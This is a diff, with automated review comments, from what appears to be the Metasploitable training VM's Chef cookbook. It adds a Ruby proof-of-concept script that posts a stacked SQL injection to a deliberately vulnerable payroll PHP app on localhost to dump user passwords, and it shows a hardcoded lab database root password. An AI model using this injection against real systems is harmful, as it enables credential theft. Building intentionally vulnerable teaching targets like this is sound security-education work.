diff --git a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
index ee8a8f7..7e05f68 100644
--- a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
@@ -38,6 +38,7 @@ if($_POST['s']){
foreach ($keys as $key) {
echo "
" . $row[$key] . " | ";
}
+ echo "\n";
}
$result->free();
}
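Review bot: The added `echo "\n"` only separates rows when the response body is read as plain text; in a browser the newline is collapsed as whitespace, so a reader of this loop will not see why it is there. Presumably it is for the poc.rb script added in this commit, which prints `res.body` verbatim; a trailing comment such as `echo "\n"; // one row per line so the raw response body stays readable outside a browser` would record that. Note that the enclosing row loop and the `if($_POST['s'])` block both start outside this hunk.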
diff --git a/chef/cookbooks/metasploitable/files/payroll_app/poc.rb b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
new file mode 100644
index 0000000..48452b6
--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url = "http://127.0.0.1/payroll_app.php"
+uri = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"
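Review bot: poc.rb has no shebang line, yet the recipe hunk in this same commit installs it as `/home/vagrant/poc/payroll_app/poc.rb` with `mode '0755'`, so running it as `./poc.rb` would be handed to the shell rather than Ruby; add `#!/usr/bin/env ruby` as the first line. `Net::HTTP.post_form` raises (for example `Errno::ECONNREFUSED`) when nothing is listening on 127.0.0.1, so the script would abort with a backtrace before reaching its own `puts "Done"`; wrapping the request in `begin ... rescue SystemCallError, Net::OpenTimeout => e` with a one-line message would make the failure readable for whoever runs the demo. The response status is also never inspected, so a server error page and a real result print the same way; `puts "Status #{res.code}"` next to the body line would distinguish them. The `url` variable is used only to build `uri` and could be folded into `uri = URI("http://127.0.0.1/payroll_app.php")`.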
diff --git a/chef/cookbooks/metasploitable/recipes/payroll_app.rb b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
index 9e8f97a..94d8d2d 100644
--- a/chef/cookbooks/metasploitable/recipes/payroll_app.rb
+++ b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
@@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
mode '0755'
end
+directory '/home/vagrant/poc/payroll_app/' do
+ mode '0755'
+ owner 'vagrant'
+ recursive true
+end
+
+cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
+ source 'payroll_app/poc.rb'
+ mode '0755'
+end
+
bash 'create payroll database and import data' do
code <<-EOH
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"